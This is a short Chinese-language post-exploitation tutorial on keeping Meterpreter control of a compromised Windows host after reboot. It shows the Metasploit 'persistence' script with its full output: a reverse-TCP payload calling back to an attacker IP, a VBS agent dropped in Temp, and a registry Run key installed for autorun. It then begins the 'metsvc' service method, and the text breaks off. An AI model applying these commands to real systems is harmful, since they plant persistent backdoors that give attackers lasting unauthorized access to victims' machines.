meterpreter 在獲取shell之後，如何持續控制目標主機，即在目標主機重啟或下次開機後能自動連線到攻擊主機上，不必每次都需要進行攻擊取得 meterpreter。

1. 通過persistence指令碼

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17

# -X 開機自啟動 # -i <num> payload重連的間隔時間 # -p 反向連線埠號 # -r 反向連線IP地址 # # 更多使用方法請參考幫助 run persistence -h # meterpreter > run persistence -X -i 5 -p 4444 -r 192.168.3.12 [*] Running Persistance Script [*] Resource file for cleanup created at /root/.msf5/logs/persistence/EVAN_20160604.3957/EVAN_20160604.3957.rc [*] Creating Payload=windows/meterpreter/reverse_tcp LHOST=192.168.3.12 LPORT=4444 [*] Persistent agent script is 148461 bytes long [+] Persistent Script written to C:\DOCUME~1\wangjun\LOCALS~1\Temp\VKZehDGmg.vbs [*] Executing script C:\DOCUME~1\wangjun\LOCALS~1\Temp\VKZehDGmg.vbs [+] Agent executed with PID 3892 [*] Installing into autorun as HKLM\Software\Microsoft\Windows\CurrentVersion\Run\UymiaoVKhfXxH [+] Installed into autorun as HKLM\Software\Microsoft\Windows\CurrentVersion\Run\UymiaoVKhfXxH

2. 通過metsvc服務的方式

執行”run metsvc”將會在目標主機上以Meterpreter的服務的形式註冊在服務列表中，並開機自動自動。執行”run metsvc -r”解除安裝目標主機上的Meterpreter服務。

1 2 3 4 5 6 7 8 9 10

meterpreter > run metsvc [*] Creating a meterpreter service on port 31337